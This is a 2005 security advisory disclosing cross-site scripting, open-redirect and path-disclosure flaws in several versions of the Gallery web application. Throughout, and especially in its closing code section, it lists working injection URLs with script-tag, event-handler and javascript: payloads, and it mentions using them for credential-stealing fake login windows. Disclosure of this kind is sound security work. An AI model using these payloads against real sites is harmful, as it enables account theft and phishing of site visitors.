<<< Date Index >>>     <<< Thread Index >>>

Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    Gallery
Vendors:        http://gallery.sourceforge.net
Versions:       v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
Platforms:      Windows
Bug:              Cross Site Scripting Vulnerability
Exploitation:   Remote With Browser
Date:             17 Jan 2005
Author:          Rafel Ivgi, The-Insider
E-Mail:          the_insider@xxxxxxxx
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Gallery is open to Cross Site Scripting vulnerability, allowing a remote
attacker to inject and execute scripts on the user’s machine while visiting
a remote gallery.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the
‘index’ field. The injection can be done using the classical tag closing:
"><script>alert()</script>

For Example:
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1">
<script>alert()</script>


Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’
in ALL the fields. The ‘slideshow_low.php’ contains the following form
fields:
set_albumName
slide_index
slide_full
slide_loop
slide_pause
slide_dir

The injection can be done using the classical tag closing:
"><script>alert()</script>

For Example:
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_
index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl
ide_dir=1

Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the
‘username’ field. The injection can be done using hex encoded tag closing
and an HTML event:
%22%20onactivate%3D"alert%28%29"

For Example:
http://<valid
host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"



Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the
‘username’ field.
The injection can be done using hex encoded tag closing and an HTML event:
%22%20onactivate%3D"alert%28%29"
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20
onactivate%3Dalert%28%29%3e
This version of Gallery also has an open redirection, which is a security
risk because
an attacker can send someone a link with a redirection to his evil host name
or to cause
the user to commit an attack or waste a target’s resources.

For Example:
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape
encoded evil
host name>&cmd= All the vulnerabilities described above can be used to
remotely call
a JavaScript file The injected JavaScript code is responsible for:
Automatic launching of malicious code (remote compromise by I.E exploits).
Identity theft using a spoofed re-login window (only for galleries with
login)

Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the
‘g2_form[subject]’
field. The injection can be done using an inline javascript protocol call:
javascript:alert()

For Example:
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
_form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert
()[/img]&g2_form[action][preview]=preview

Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
‘g2_subView’ parameter. It is possible the replace any valid subView value
such as: comment
:ShowComments with the admin value: core:UserAdmin. This causes the gallery
to wait 30 seconds
and then print out the Full Path of the gallery on the server.

For Example:
http://<valid host>/g2/main.php?g2_return= http://<valid
host>/main.php%3Fg2_view%3Dcore
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session
id such as:
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&amp;g2_subView=core
:UserAdmin

Then the following data will be printed out to the attacker:
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/UserAdmin.inc on line 55

Second Time
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/classes/GalleryUtilities.class on line 596

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Gallery v1.3.4-pl1
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al
ert()</script>
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s
cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"

Gallery v1.4.4-pl2
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*
/%20onactivate%3Dalert%28%29%3e<plaintext>
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww
.google.com&cmd=

Gallery v2.0 Alpha

1)  http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
 _form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview
]=preview

2)
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am
p;g2_view=core:UserAdmin&amp;g2_subView=core:UserAdmin



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."